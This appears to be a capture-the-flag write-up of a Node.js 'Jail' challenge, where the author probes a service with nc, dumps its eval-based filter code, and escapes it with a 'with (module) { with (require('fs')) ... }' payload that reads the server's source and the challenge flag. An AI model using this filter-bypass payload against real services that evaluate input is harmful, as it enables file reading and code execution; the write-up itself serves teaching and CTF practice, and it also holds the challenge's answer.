This was an interesting challenge… I thought I knew JavaScript before this game, but by the end of it I found out that there are still things I can learn.
Question:
Jail – Pwn (200 + 0)
Joey gave you the disk with the file on it and now you’re in jail. They’re charging you with some serious shit, man! Better figure out a way to escape.
Solves: 43
Service: jail.alieni.se:55542
Author: avlidienbrunn
Once I connected to the server with nc, it showed the following screen:
I tried entering some characters such as 555-4202, and it showed the following screen:
Phone #> 555-4202 Calling -3647... Nobody picks up!
Cool! It looked like an eval function was used in this program, but I still didn't know which programming language.
Next, I tried to enter the following
echo -e '\n12345' | nc jail.alieni.se 55542 Phone #> Calling undefined... Nobody picks up!
Keyword undefined obtained! Which language returns undefined? The first thing that came to my mind was JavaScript!
So I tried the following
Phone #> console.log('123'); Dangerous characters detected
It seemed there was some filtering before the program evaluated the answer. After some trying, I found this:
Phone #> this Calling function call(number) { var hangup = process.exit; var line = ""; if(number == 911){ console.log("Invalid number"); ask(); return; } var flag,Array,Boolean,Date,global,Error,EvalError,Function,Number,Object,RangeError,ReferenceError,String,SyntaxError,TypeError,URIError,decodeURI,decodeURIComponent,encodeURI,encodeURIComponent,isFinite,isNaN,parseFloat,parseInt,ArrayBuffer,Buffer,DTRACE_HTTP_CLIENT_REQUEST,DTRACE_HTTP_CLIENT_RESPONSE,DTRACE_HTTP_SERVER_REQUEST,DTRACE_HTTP_SERVER_RESPONSE,DTRACE_NET_SERVER_CONNECTION,DTRACE_NET_STREAM_END,DataView,Float32Array,Float64Array,Int16Array,Int32Array,Int8Array,Map,Promise,Proxy,Set,Symbol,Uint16Array,Uint32Array,Uint8Array,Uint8ClampedArray,WeakMap,WeakSet,assert,clearImmediate,clearInterval,clearTimeout,escape,events,require,setImmediate,setInterval,setTimeout,stream,unescape,__defineGetter__,__defineSetter__,__lookupGetter__,__lookupSetter__,constructor,hasOwnProperty,isPrototypeOf,propertyIsEnumerable,toLocaleString,toString,valueOf; if(new RegExp(/[\[\]\.\\]/).test(number)){ console.log("Dangerous characters detected"); hangup(); return; } arguments = undefined; console.log("Calling "+eval(number)+"... Nobody picks up!"); hangup(); }... Nobody picks up!
Ok, the filter was now clear. The default globals (Array, Function, require, constructor, …) were shadowed as undefined by local `var` declarations inside the function (JavaScript's function scoping), and the characters '[', ']', '.' and '\' were rejected by the RegExp.
So, it ‘seemed’ that all function calls were blocked. But was that really the case?
When I first learnt programming with VBScript, there was a magic statement called ‘with’. Thanks to ECMAScript 262, `with` is also defined in JavaScript: it places an object's properties on the scope chain, so they can be reached as bare identifiers without writing a single ‘.’ or ‘[’ — which is exactly what the filter was looking for.
HAHA, the PoC:
Phone #> with (module) { with (require('fs')) { readFileSync(__filename) } } Calling var flag = "SECT{1ts_1n_th4T_pl4Ce_Wh3re_1_Pu7_tH4t_Th1ng_th4T_t1m3,}" var readline = require('readline'); var rl = readline.createInterface(process.stdin, process.stdout); var Jail = (function() { var rv = {}; function call(number) { var hangup = process.exit; var line = ""; if(number == 911){ console.log("Invalid number"); ask(); return; } var flag,Array,Boolean,Date,global,Error,EvalError,Function,Number,Object,RangeError,ReferenceError,String,SyntaxError,TypeError,URIError,decodeURI,decodeURIComponent,encodeURI,encodeURIComponent,isFinite,isNaN,parseFloat,parseInt,ArrayBuffer,Buffer,DTRACE_HTTP_CLIENT_REQUEST,DTRACE_HTTP_CLIENT_RESPONSE,DTRACE_HTTP_SERVER_REQUEST,DTRACE_HTTP_SERVER_RESPONSE,DTRACE_NET_SERVER_CONNECTION,DTRACE_NET_STREAM_END,DataView,Float32Array,Float64Array,Int16Array,Int32Array,Int8Array,Map,Promise,Proxy,Set,Symbol,Uint16Array,Uint32Array,Uint8Array,Uint8ClampedArray,WeakMap,WeakSet,assert,clearImmediate,clearInterval,clearTimeout,escape,events,require,setImmediate,setInterval,setTimeout,stream,unescape,__defineGetter__,__defineSetter__,__lookupGetter__,__lookupSetter__,constructor,hasOwnProperty,isPrototypeOf,propertyIsEnumerable,toLocaleString,toString,valueOf; if(new RegExp(/[\[\]\.\\]/).test(number)){ console.log("Dangerous characters detected"); hangup(); return; } arguments = undefined; console.log("Calling "+eval(number)+"... Nobody picks up!"); hangup(); }; rv.call = call; rv.toString = function(){return rv.call.toString()}; return rv; })(); template = `_____________________________ || || || || || ||, , ,|| || || (||/|/(\/||/ || || ||| _'_´||| || || || o o || || || (|| - ´||) || || || = || || || ||\\___/|| || ||___||) , (||___|| /||---||-\\_/-||---||\\ / ||--_||_____||_--|| \\ (_(||)-|S555-4202|-(||)_) |"""""""""""""""""""""""""""| | "You get one call, UNO." 
| """"""""""""""""""""""""""" Phone #> `; function ask(){ rl.question(template,function(answer){ Jail.call(answer); }); } ask(); ... Nobody picks up!
Cheers!